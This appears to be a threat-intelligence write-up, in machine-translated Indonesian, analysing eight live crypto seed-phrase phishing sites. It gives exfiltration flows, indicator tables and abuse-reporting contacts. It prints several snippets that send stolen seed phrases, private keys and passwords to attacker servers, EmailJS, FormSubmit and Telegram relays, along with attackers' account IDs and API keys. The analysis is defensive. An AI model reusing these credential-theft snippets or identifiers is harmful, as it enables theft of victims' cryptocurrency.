Analisis Phishing Kripto:
8 Serangan Nyata yang Dianalisis
Kami berhasil mencegat lalu lintas phishing yang sedang berlangsung, melakukan rekayasa balik terhadap 5 program pencuri frasa benih, dan melacak data yang dicuri hingga ke bot Telegram, akun EmailJS, serta backend layanan Phishing-as-a-Service.

Apa yang Kami Temukan
Setiap hari, ribuan pengguna mata uang kripto kehilangan dananya akibat situs phishing yang tampak tak bisa dibedakan dari layanan dompet yang sah. Namun, apa yang terjadi di belakang Tombol "Connect Wallet" palsu itu? Ke mana sebenarnya frasa seed Anda disimpan?
Kami menyadap lalu lintas HTTP langsung dari 5 situs phishing yang aktif, mengunduh kode sumber lengkapnya, dan melacak setiap titik akhir pengaliran data hingga ke tujuan akhirnya. Penyelidikan ini mengungkap seluk-beluk lengkap phishing kripto modern — mulai dari trik rekayasa sosial yang membuat Anda mengetikkan frasa benih, hingga bot Telegram yang mengirimkannya kepada penyerang secara real-time.
Semua frasa benih yang ditampilkan dalam artikel ini merupakan data uji yang dihasilkan secara acak. Tidak ada kredensial asli yang bocor selama penyelidikan ini. Semua situs tersebut telah dilaporkan kepada penyedia layanan hosting dan departemen penanggulangan penyalahgunaan masing-masing.
Pola Serangan Universal
Meskipun memiliki merek dan sistem backend yang berbeda-beda, kesembilan situs phishing tersebut mengikuti corong psikologis yang persis sama:
Wawasan penting: animasi "Sedang terhubung..." selalu sudah diprogram sedemikian rupa agar gagal. Dalam kode sumber Situs #4, kami menemukan const success = false — tidak ada upaya untuk menghubungkan dompet. Seluruh alur ini hanya bertujuan untuk mengarahkan korban ke formulir "Hubungkan Secara Manual".

8 Lokasi: Rincian Lengkap
Peniruan identitas
Sebuah "protokol terdesentralisasi" fiktif untuk validasi dompet. Menggunakan ticker harga CryptoCompare secara real-time dan tautan ke penjelajah blockchain asli (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) untuk menjamin kredibilitasnya. Halaman utama menampilkan lebih dari 100 logo dompet dan proses "validasi" dalam 3 langkah.
Rantai Eksfiltrasi Ganda
Backend yang paling canggih di antara kelima sistem tersebut — setiap kredensial yang dicuri dikirim melalui dua saluran independen secara bersamaan:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on Render.com
| |
| +--> Telegram Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) Temuan OSINT
| Indikator | Nilai |
|---|---|
| Email Penipu | Bestgrace309@gmail.com |
| Bot Telegram | @DewdropsTG_bot (ID: 7567323692) |
| Penerima Telegram | @metatech2 (ID Obrolan: 7350941887) |
| Backend | emailjs-backend-ovtg.onrender.com |
| Layanan EmailJS | service_d5qigxs / template_7bqxeaa |
| Domain Tersembunyi | layerschain.in (dari penyamaran alamat email CF) |
| Pesan yang Dikirim | 1.824+ (dari ID pesan Telegram) |
| Usia Domain | 2 hari (TLS: 25 Maret 2026) |
Alamat email pelaku ditemukan di sebuah Komentar JavaScript di dalam config.js: // Bestgrace309@gmail.com. Mereka lupa menghapusnya sebelum melakukan deployment. Selain itu, backend relay Telegram sepenuhnya terbuka — tanpa otentikasi, tanpa pembatasan laju. Dengan mendekode Cloudflare's data-cfemail Selain teknik pengaburan dalam kode HTML, kami juga menemukan alamat email tersembunyi: support@layerschain.in, yang terhubung dengan infrastruktur hosting di India dan Afrika Selatan.
Peniruan identitas
Penyalinan yang sempurna hingga tingkat piksel dari dunia nyata Aqualibre (AQLA) halaman migrasi token. Kode HTML tersebut berisi tag metadata yang menunjukkan sumbernya: data-scrapbook-source="https://token.aqla.app/migration", bertanggal 19 November 2024.
Pendekatan Tanpa Kode
Penyerang ini memerlukan tanpa kode di sisi server. Formulir tersebut mengirimkan data secara langsung ke Tidak statis — sebuah backend formulir yang sah untuk situs statis. Setiap pengiriman data diteruskan ke alamat email penipu. Alamat email penyerang adalah tidak pernah terlihat dalam kode sumber.
<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
Cloudflare Pages: gratis. Un-static Forms: gratis. Tidak ada domain yang dibeli. Tidak ada server yang disewa. Total biaya infrastruktur: nol dolar.
Peniruan identitas
Subdomain tersebut berisi "safpal" — sebuah kesalahan ejaan yang disengaja dari SafePal, sebuah dompet perangkat keras yang populer. Situs tersebut menyamar sebagai "Blockchain Wallet Rectification" dengan 26 kategori masalah palsu. Menggunakan Typed.js untuk menampilkan animasi nama-nama rantai (Ethereum, BSC, Polygon...) dan ticker LiveCoinWatch untuk menambah kesan kredibilitas.
Perangkat yang Sama, Operator yang Sama?
Menggunakan templat phishing yang persis sama sebagai Lokasi #2:
sama persis connect.html, sama persis wallets.html dengan lebih dari 60 logo, menggunakan backend Un-static yang sama (ID formulir yang berbeda — 6f1b82c3...da9943af). Kit yang identik tersebut sangat mengindikasikan satu operator yang mengelola kedua situs tersebut.
Hal-hal yang perlu diperhatikan dalam kode: "Privay Policy" (kurang huruf 'c'), "seperated" (seharusnya "separated"), "Kestore" (kurang huruf 'y'). Kolom kata sandi menggunakan type="text" daripada type="password".
Peniruan identitas
Sebuah tiruan yang nyaris sempurna dari Jaringan Flare portal — blockchain EVM Layer-1 sejati yang dilengkapi dengan protokol FTSO dan Data Connector. Meniru lebih dari 30 mitra ekosistem, antarmuka navigasi, dan identitas merek. Favicon dimuat dari domain typosquat: portal.flaremainet.com (ada satu huruf 'n' yang hilang dari kata "mainnet").
Redundansi Ganda EmailJS
Satu-satunya situs yang menggunakan dua akun EmailJS yang berbeda secara bersamaan untuk redundansi anti-Penghapusan:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) Subjek email untuk setiap kasus pencurian: "New Wallet Details from Flare".
HTML tersebut berisi Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Perlindungan PPC Lunio, dan sebuah Piksel Iklan Twitter/X. Penyerang sedang menjalankan iklan berbayar untuk mengarahkan korban ke situs phishing dan menyaring klik bot. Ini bukan sekadar hobi — ini adalah operasi yang didanai dengan sistem analitik dan anggaran iklan.

Peniruan identitas
Layanan "COIN NODE" / "Wallet Fix" umum (tanpa merek tertentu). Hak Cipta "Wallet Fix 2022" — templat kit ini sudah berumur setidaknya 4 tahun. Gambar-gambar dihosting di pumpeth.com (WordPress di AWS).
Phishing sebagai Layanan
Arsitektur backend yang paling mengkhawatirkan: sebuah API multi-tenant berbasis UUID:
POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+... Setiap penipu mendapatkan titik akhir UUID masing-masing. Seorang operator pusat mengelola API tersebut, memantau kampanye, dan kemungkinan mengambil bagian dari dana yang dicuri. Ini adalah pencurian kripto yang dilakukan secara terorganisir — model Phishing-as-a-Service.
Infrastruktur Terkait (Sebagian Besar Sudah Tidak Berfungsi)
| Domain | Peran | Status |
|---|---|---|
| api.pulseresolve.com | API Eksfiltrasi | NXDOMAIN |
| walletissuesfix.net | Host favicon | NXDOMAIN |
| syncwallet.online | Logo tuan rumah | NXDOMAIN |
| pumpeth.com | CDN Gambar | Langsung (AWS) |
Backend-nya sudah mati, tapi... Frontend masih aktif di Cloudflare Pages. Jika penyerang mendaftarkan ulang pulseresolve.com, situs tersebut langsung dapat diakses kembali.
Peniruan identitas
A operasi dua arah: sebuah "Pusat Bantuan" umum di wallet-support-39n.pages.dev dengan 15 kategori penerbitan palsu dan 39 merek dompet, ditambah sebuah Klon proses orientasi pengguna Ledger yang persis sama hingga tingkat piksel di ledger-recovery.support dijalankan di Replit — lengkap dengan pilihan model perangkat, pengaturan PIN, dan kisi frasa benih berisikan 24 kata dengan Fitur autocomplete BIP39 yang sesungguhnya.
Backend C2 Anti-Pemindai
Halaman dukungan dompet mengirimkan data yang dicuri ke api.uranustoken.org/log — server C2 berbasis nginx/Ubuntu yang disesuaikan dan berada di balik Cloudflare. Bagian belakang secara sengaja memblokir semua permintaan GET (mengembalikan kode kesalahan 522 (timeout)), hanya merespons permintaan POST. Artinya, pemindai URL, crawler Google Safe Browsing, dan peneliti keamanan yang mengirimkan permintaan GET ke titik akhir tersebut tidak mendapatkan respons apa pun — server C2 tampak tidak aktif.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.uranustoken.org",
allowedWallets: ["phantom","solfare","metamask","trustwallet",
"coinbasewallet","ledger","trezor","okx","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} Klon Ledger ini menjalankan backend Express.js terpisah di Replit itu sendiri: POST /api/recovery-phrase mengumpulkan {deviceId, pin, phrase}. Hasilnya adalah 400 {"error":"Invalid data provided"} jika terjadi input yang tidak valid — untuk memastikan bahwa backend tersebut berlangsung dan sedang dilakukan validasi secara aktif data yang dicuri.
Temuan OSINT
| Indikator | Nilai |
|---|---|
| Frontend (Dompet) | wallet-support-39n.pages.dev |
| Frontend (Ledger) | ledger-recovery.support (34.111.179.208) |
| C2 Backend | api.uranustoken.org → nginx/1.24.0 Ubuntu |
| Alamat IP C2 | 104.21.60.163 / 172.67.198.35 (Cloudflare) |
| Replit Verifikasi | a43d3852-5304-47af-a61b-f0f6f3912736 |
| Petugas Pendaftaran | Name.com (ledger-recovery.support) |
| Telah diterapkan | 9 Januari 2026 (header Last-Modified) |
| Teknologi yang Digunakan | React + Vite + Tailwind v4.1 + Framer Motion |
Paket JS berukuran 466 KB tersebut berisi daftar kata BIP39 lengkap untuk fitur autocomplete real-time, terdapat 67 referensi ke "passphrase" dan 39 ke "mnemonic". Klon Ledger ini memandu korban melalui alur pendaftaran yang persis sama dengan perangkat Ledger asli — halaman phishing paling meyakinkan dalam seluruh penyelidikan ini. Halaman tersebut apiKey Kolom dalam konfigurasi tersebut menyarankan sebuah arsitektur PhaaS multi-tenant.
Peniruan identitas
Sebuah "Decentralized Launchpad" umum dengan 21 kategori umpan (Staking, Migrasi, KYC, Giveaway, Klaim Hadiah, Pemulihan Aset, Prapenjualan, Pencetakan NFT, Akun yang Terkunci...) dan Lebih dari 70 merek dompet — salah satu daftar dompet paling lengkap yang pernah kami temui. Kesalahan ketik yang mencolok, yaitu "Sychronize" (tanpa huruf 'n'), mengungkap bahwa itu palsu.
Pipa FormSubmit Pipeline
Kegunaan FormSubmit.co — layanan pengiriman formulir ke email yang sah. Hash titik akhir a2cf4131f1a5d39453c7c183df96f86f adalah nilai MD5 dari alamat email penipu tersebut. Kami mencoba ratusan pola alamat email secara acak di Gmail, Yahoo, Hotmail, ProtonMail, Yandex, dan Mail.ru — tidak ada yang cocok. Penipu tersebut menggunakan alamat email yang tidak umum atau dihasilkan secara acak.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); Temuan OSINT
| Indikator | Nilai |
|---|---|
| Domain | mainnetvalidationapp.pages.dev |
| Hash FormSubmit | a2cf4131f1a5d39453c7c183df96f86f |
| ID Kampanye | DAPP DESENTRALISASI |
| FontAwesome Kit | bdc3291137 (kit #112310842, versi gratis v6.7.2) |
| jQuery | 3.2.1 + 3.5.1 dimuat secara bersamaan |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (tidak cocok) |
FontAwesome Kit bdc3291137 — FontAwesome dapat mengidentifikasi pemilik akun di balik ID kit ini. Tag kampanye DAPP DECENTRALIZED mungkin muncul di situs phishing lain yang menggunakan hash FormSubmit yang sama. Setelah mencuri frasa benih, seorang kode QR palsu dan kode referensi acak yang terdiri dari 7 karakter ditampilkan: "Hubungi Admin dengan kode referensi unik Anda" — membuat para korban terus menunggu alih-alih melakukan penyelidikan.
Peniruan identitas
Tidak diketahui — baik frontend maupun backend sedang offline. Berdasarkan struktur payload, ini adalah serangan pencurian frasa benih dompet kripto. Serangan ini Bucket publik Cloudflare R2 (penyimpanan objek, bukan Pages) adalah sebuah vektor phishing yang telah didokumentasikan dengan baik dengan lebih dari 5.000 halaman berbahaya yang teridentifikasi dan peningkatan lalu lintas sebesar 61 kali lipat yang dilaporkan oleh Netskope.
Pengaturan Script Kiddie
Yang paling operasi dasar dalam koleksi ini. Frasa benih dikirim kata demi kata ke skrip PHP yang berjalan di komputer pribadi atau VPS yang terhubung ke layanan DNS gratis:
POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access Temuan OSINT
| Indikator | Nilai |
|---|---|
| Frontend | pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE] |
| Backend | mercifuljigga4real123.publicvm.com [NXDOMAIN] |
| ID R2 Bucket | 519769e9eb634616b1746c2018641d56 |
| Penyedia DDNS | DNSExit.com / Netdorm, Inc. (Cincinnati, OH) |
| DNS NS | ns10–13.dnsexit.com |
| Nama Pengguna | mercifuljigga4real123 |
"Merciful" + "jigga" (julukan Jay-Z) + "4real" + "123" — nama pengguna yang sangat personal dan menunjukkan kecintaannya pada budaya hip-hop. Tidak ditemukan di platform mana pun yang terindeks: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch, atau Steam. Kemungkinan aktif di Discord, Telegram, atau platform game dengan nama ini atau variasi yang mirip. Nama file fuc.php sesuai dengan gaya yang tidak konvensional dari gagangnya.
7 Cara untuk Mencuri Frasa Benih Anda

| Metode | Situs | Cara Kerjanya | Kecepatan | Biaya |
|---|---|---|---|---|
| Bot Telegram | #1 | Express.js di Render.com bertindak sebagai perantara ke Bot API. Penipu langsung menerima pesan langsung (DM) berisi kredensial. | Secara real-time | $0 |
| EmailJS | #1, #4 | JavaScript sisi klien mengirimkan data secara langsung ke API EmailJS, yang kemudian meneruskannya ke alamat email penipu. | ~1 menit | $0 |
| Formulir yang Tidak Statis | #2, #3 | Formulir HTML standar dengan metode POST ke layanan formulir yang sah, yang meneruskan kiriman melalui email. | ~1 menit | $0 |
| FormSubmit.co | #7 | jQuery AJAX ke FormSubmit.co. Alamat email disembunyikan di balik hash MD5. Kampanye diberi tag "DAPP DECENTRALIZED". | ~1 menit | $0 |
| API C2 Khusus | #6 | React SPA mengirimkan permintaan ke API nginx/Express yang berada di balik Cloudflare. Menolak permintaan GET (522) untuk menghindari pemindai. Hanya merespons permintaan POST. | Secara real-time | ~$5 per bulan |
| PHP + DDNS | #8 | Skrip PHP di komputer pribadi melalui layanan DNS gratis (publicvm.com). Frasa benih dikirim kata demi kata. | Secara real-time | $0 |
| API PhaaS | #5 | API multi-tenant berbasis UUID. Operator pusat mengelola bagian belakang sistem, sedangkan para penipu menyewa titik akhir. | Secara real-time | Tidak diketahui |
7 Tanda Peringatan yang Mengungkap Setiap Situs Phishing
Jika Anda melihat apa pun Jika Anda menemui hal-hal berikut, segera tutup tab tersebut:
Koneksi dompet yang sesungguhnya menggunakan protokol WalletConnect atau ekstensi browser. Koneksi tersebut tidak pernah menampilkan pesan kesalahan "Koneksi Gagal" yang meminta Anda untuk memasukkan frasa benih.
Setiap ikon dompet mengarah ke formulir yang sama. Layanan yang sesungguhnya akan mengintegrasikan SDK asli dari masing-masing dompet.
Pesan kesalahan palsu "503 Error" atau "Unknown Error" yang muncul setelah pengiriman dilakukan secara sengaja. Data Anda sudah dicuri — pesan kesalahan tersebut bertujuan menipu Anda agar mencoba lagi dengan dompet digital lain.
Kelima situs tersebut menyalahgunakan layanan gratis Cloudflare Pages. Tidak diperlukan verifikasi identitas. Penyalahgunaan Cloudflare Pages untuk aksi phishing meningkat sebesar 198% pada tahun 2025.
Tidak ada layanan resmi yang memerlukan ketiga jenis kredensial tersebut. Formulir dengan tiga tab ini merupakan ciri khas dari perangkat phishing.
Tak satu pun dari situs-situs ini bisa dimuat ethers.js, web3.js, atau melakukan panggilan RPC apa pun. Itu hanyalah formulir HTML murni yang menyamar sebagai dApps.
Hosting gratis + layanan formulir gratis + layanan pesan gratis = operasi phishing lengkap dengan biaya $0. Jika situs tersebut tidak memiliki domain asli, waspadalah.
Tabel IOC Lengkap
Bagi tim keamanan, platform intelijen ancaman, dan pelapor penyalahgunaan:
Domain & Infrastruktur
| Domain | Jenis | Status |
|---|---|---|
| networklayers.pages.dev | Antarmuka phishing | Langsung |
| token-aqla.pages.dev | Antarmuka phishing | Langsung |
| antiresolve-mysafpalnode.pages.dev | Antarmuka phishing | Langsung |
| flaremainnet.pages.dev | Antarmuka phishing | Langsung |
| swiftauthapps.pages.dev | Antarmuka phishing | Langsung |
| emailjs-backend-ovtg.onrender.com | Backend relai TG | Langsung |
| portal.flaremainet.com | Aset typosquat | Tidak diketahui |
| layerschain.in | Domain terkait | DNS tidak berfungsi |
| api.pulseresolve.com | Backend PhaaS | NXDOMAIN |
| walletissuesfix.net | Penyedia aset | NXDOMAIN |
| syncwallet.online | Logo tuan rumah | NXDOMAIN |
| pumpeth.com | CDN Gambar | Langsung (AWS) |
| wallet-support-39n.pages.dev | Antarmuka phishing | Langsung |
| ledger-recovery.support | Phishing Ledger (Replit) | Langsung |
| api.uranustoken.org | Backend C2 (nginx/Ubuntu) | Langsung |
| uranustoken.org | Domain akar | 404 |
| mainnetvalidationapp.pages.dev | Antarmuka phishing | Langsung |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | Phishing (kelompok R2) | Offline |
| mercifuljigga4real123.publicvm.com | Backend PHP (DDNS) | NXDOMAIN |
Akun & Pengenal
| Jenis | Nilai | Situs |
|---|---|---|
| Bestgrace309@gmail.com | #1 | |
| Email (disembunyikan) | support@layerschain.in | #1 |
| Bot Telegram | @DewdropsTG_bot (7567323692) | #1 |
| Pengguna Telegram | @metatech2 (7350941887) | #1 |
| EmailJS #1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS #2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS #3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| Formulir yang Tidak Statis | c78173e2d991...94c3f76 | #2 |
| Formulir yang Tidak Statis | 6f1b82c3ce55...da9943af | #3 |
| UUID PhaaS | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| Instansi Render | rndr-id: ed83576e-b1b3-4c82 | #1 |
| Replit Verifikasi | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| MD5 Pengiriman Formulir | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| Tag Kampanye | DAPP DESENTRALISASI | #7 |
| FontAwesome Kit | bdc3291137 (kit #112310842) | #7 |
| ID R2 Bucket | 519769e9eb634616b1746c2018641d56 | #8 |
| Nama Pengguna/DDNS | mercifuljigga4real123 | #8 |
Ke Mana Harus Melaporkan Upaya Phishing Terkait Kripto

| Layanan | Apa yang Harus Dilaporkan | Bagaimana |
|---|---|---|
| Cloudflare | 7x .pages.dev + 1x bucket R2 | abuse.cloudflare.com |
| Google Safe Browsing | Semua URL phishing | Laporkan Phishing |
| PhishTank | Semua URL untuk daftar blokir komunitas | phishtank.org |
| EmailJS | 3 akun yang disalahgunakan (ID layanan di atas) | abuse@emailjs.com |
| Tidak statis | 2 titik akhir formulir | Hubungi kami melalui un-static.com |
| Render.com | Backend relai Telegram | Formulir pelaporan penyalahgunaan |
| Telegram | @DewdropsTG_bot + @metatech2 | telegram.org/support |
| Google (Gmail) | Bestgrace309@gmail.com | Laporan penyalahgunaan Google |
| Twitter/X | Akun iklan yang mempromosikan Situs #4 | Laporan penyalahgunaan iklan X |
| FormSubmit.co | Hash a2cf4131... (#7) | Formulir Pengaduan Penyalahgunaan FormSubmit |
| Replit | ledger-recovery.support (#6) | Laporan penyalahgunaan Replit |
| Name.com | Pendaftar untuk ledger-recovery.support | Pelaporan Penyalahgunaan di Name.com |
| DNSExit | mercifuljigga4real123.publicvm.com | Penyalahgunaan dnsexit.com |
| FontAwesome | Kit bdc3291137 (#7) | Penyalahgunaan FontAwesome |
| Chainabuse | Semua kampanye phishing | Chainabuse.com |
Cara Melindungi Diri Anda
Tidak ada layanan resmi pun yang akan meminta Anda untuk memasukkan frasa benih Anda ke dalam situs web. Frasa benih hanya dimasukkan ke dalam perangkat lunak dompet resmi saat proses pemulihan dompet — jangan pernah dimasukkan di situs web pihak ketiga yang mengklaim sebagai layanan "validasi", "sinkronisasi", atau "pemulihan".
Sebelum menghubungkan dompet apa pun:
- Pastikan URL tersebut sesuai dengan domain resmi. Periksa detail sertifikat SSL.
- WalletConnect yang asli menggunakan kode QR atau tautan langsung — bukan formulir frasa benih.
- Jika "koneksi gagal" dan Anda diminta memasukkan kredensial secara manual — itu adalah serangan phishing.
- Periksa URL yang mencurigakan di PhishTank atau VirusTotal sebelum berinteraksi.
- Gunakan dompet perangkat keras — dompet ini memerlukan konfirmasi fisik untuk setiap transaksi.
- Tandai URL resmi. Jangan pernah mengklik tautan dari iklan, pesan langsung (DM), atau media sosial.
Taksonomi Phishing Kripto
Penipu yang mencuri frasa benih hanyalah salah satu kategori. Berikut ini gambaran lengkap tentang phishing kripto — kami akan menyajikan pembahasan mendalam mengenai setiap jenisnya.
Kebenaran yang Tak Nyaman
Biaya yang diperlukan untuk menyiapkan operasi phishing kripto $0 dan membutuhkan kurang dari 30 menit. Layanan hosting gratis, layanan formulir gratis, bot pesan gratis. Pelaku serangan di balik Situs #1 telah mencuri kredensial dari 1.824+ korban. Situs #4 sedang beroperasi iklan berbayar secara besar-besaran. Ini bukan main-main — ini adalah sebuah industri. Satu-satunya cara untuk melindungi diri adalah dengan meningkatkan kewaspadaan.
Bantu Kami Melawan
PhishDestroy melacak dan melaporkan situs phishing kripto secara real-time. Jika Anda menemukan situs yang mencurigakan, laporkan kepada kami — kami akan menyelidikinya dan berupaya agar situs tersebut ditutup.



